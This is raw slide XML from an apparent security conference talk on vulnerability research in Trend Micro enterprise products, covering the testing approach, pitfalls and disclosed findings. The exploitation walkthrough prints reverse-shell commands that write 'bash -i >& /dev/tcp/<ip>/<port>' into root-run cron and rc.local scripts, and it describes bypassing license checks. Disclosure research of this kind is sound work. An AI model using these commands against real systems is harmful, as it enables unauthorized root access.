                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> _ | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> –u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-H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dirty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hr-HR" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> -v '@\|;\|#\|&amp;\|%\|\\$\|=\|?\|(\|)\|!\|\"\|:\|-\|&gt;\|\.\|[0-9]\|[A-Z]\|^_\|\s\|\\' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> _ | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> –u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"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r-HR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"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62"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="185116" y="2132856"/>
            <a:ext cx="11813952" cy="29523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r-HR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1989956" y="1769819"/>
            <a:ext cx="8503975" cy="440238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 &amp; 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Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>Managing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>reports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>was very tricky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>This was reduced since we could send these report’s off to ZDI to help us</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found many duplicates between us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Had to come out with a better system to share bugs!</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>Software access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>Getting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>up</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>-to-date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1" smtClean="0"/>
              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>was very hard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limited downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trial license with 30 days duration for some products only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some functionality disabled due to lack of full license (e.g. Active Directory integration)</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hr-HR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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endParaRPr lang="en-US" dirty="0"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2106861" y="1905000"/>
            <a:ext cx="4419599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About us</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pitfalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overall results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References</a:t>
            </a:r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18348" y="1905000"/>
            <a:ext cx="4419598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Smart Protection Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Loss Prevention Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>InterScan Web Security Virtual Appliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Mobile Security For Enterprise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SafeSync </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Enterprise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84309" y="3140968"/>
            <a:ext cx="1385967" cy="418917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5014292" y="1903701"/>
            <a:ext cx="504056" cy="3312368"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrac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 &amp; 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Mistakes and laziness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rushing into a vulnerability class without understanding the context of the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not enabling all functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some bugs could only be triggered changing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>default state</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ignoring third party components or external software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not setting up an enterprise network (e.g. AD, Exchange server, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A good number of discovered vulnerabilities still require authentication to trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR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Protection Server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1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106" y="1761076"/>
            <a:ext cx="3312368" cy="2270628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804" y="1898104"/>
            <a:ext cx="9144000" cy="426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Acts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as a central data repository for internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reputation data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Complimentary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with Office Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consumed by Trend Micro Office Scan clients running on workstations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Smaller bandwidth consumption when updating patterns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>querying URL validity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache + PHP 5 on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How many vulnerabilities in this product?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x OS Command Injection vulnerabilities (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x introduced with a patch!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x Privilege Escalation vulnerabilities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java codebase was actually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>quite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>strong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                                       … but… PHP had multiple vulnerabilities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0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5" b="28765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6526460" y="2924944"/>
            <a:ext cx="5054349" cy="144016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836" y="1898104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We had no license</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t> b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>ut we had access to patches !</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="is-IS" strike="sngStrike" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" strike="sngStrike" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Install patches via the web interface GUI</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" strike="sngStrike" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t> So we performed a ghetto update install:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Pop a shell using an old vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>atch the install.sh to remove version detection and license checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Run install.sh on the command line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0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wcs_bwlists_handler Cmd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74814" y="20574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" y="2348880"/>
            <a:ext cx="11553829" cy="2290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60" y="4396967"/>
            <a:ext cx="9103150" cy="237151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800676" y="1772816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An exploitation walk through using a zero-day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>…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Elevation of Privileges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8" y="19050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Simple elevation of privilege vulnerabilities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tpdate.sh rc.local Elevation of Privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ProgramUpdateNotify.sh rc.local Elevation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CDTPurge.sh crontab Elevation of Privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tlogger crontab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Elevation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The /etc/rc.local script executes two webserv owned </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&amp; writable scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The crontab executes two webserv owned and writable scripts, once a day and once an hour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>…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2132856"/>
            <a:ext cx="3624123" cy="2098675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of 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01924" y="1844824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In /etc/rc.local we see execution of two different files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5" y="2492896"/>
            <a:ext cx="11587496" cy="18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4509120"/>
            <a:ext cx="6979628" cy="16374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24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of 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756" y="1905000"/>
            <a:ext cx="11665296" cy="4267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echo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"bash -i &gt;&amp; /dev/tcp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/&lt;ip&gt;/&lt;port&gt;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0&gt;&amp;1" &gt; /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usr/tmcss/bin/tlogger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echo "bash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-i &gt;&amp; /dev/tcp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/&lt;ip&gt;/&lt;port&gt;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0&gt;&amp;1" &gt; /usr/tmcss/bin/CDTPurge.sh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5820" y="1844824"/>
            <a:ext cx="8312727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In the crontab we see the same thing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02" y="2348880"/>
            <a:ext cx="7447804" cy="21602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the vulnerabilities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6" y="2460340"/>
            <a:ext cx="11593433" cy="28921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74814" y="20574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800676" y="1772816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smtClean="0"/>
              <a:t>... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>nd we are root: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4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Roberto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suggi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Liverani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@malerisch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Independent Security Researcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discovered critical vulnerabilities in vendors such as:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Google, Oracle, Mozilla, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HPE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Guest speaker at HiTB, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EUSecWest, Ruxcon, Kiwicon,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DEFCON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and HackPra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AllStars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://blog.malerisch.net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4" y="1772815"/>
            <a:ext cx="2552584" cy="2552584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injection requires authentication!! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>The target is also riddled with CSRF and XSS issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>These issues have not yet been reported... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers cannot gain a root shell without client interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>That</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>s not our style!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No need to use an old kernel bug that could crash the kernel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Remember, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ommand Injection vulnerability was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>introduced in a security patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" b="1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41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 to conclude, this is an on-going </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will address the authentication mechanism in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the future!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still, we achieved remote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e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xecution and elevated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rivileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Patch available: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success.trendmicro.com/solution/1117033</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-I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7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Loss Prevention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 Life (EOL)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Product to prevent IP theft and data loss within an organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Based on agent and network monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network inspection for different protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Agent supports multiple file formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Policies based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Previous security research was done by Kelly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Lum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and Zach Lanier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Out of the Kitchen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Kitchen's Finally Burned Down</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>identified some of the attack surface that we audited and found vulnerabilities in!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KeyView</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DLP client agent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0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Apache Tomcat with compiled CGI and a MySQL database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Server + Administrative web interface on port 8443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Server (Tomcat) on port 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used by DLP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crawler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dscctrl daemon SSL/TCP/8904 and TCP/8804 </a:t>
            </a:r>
          </a:p>
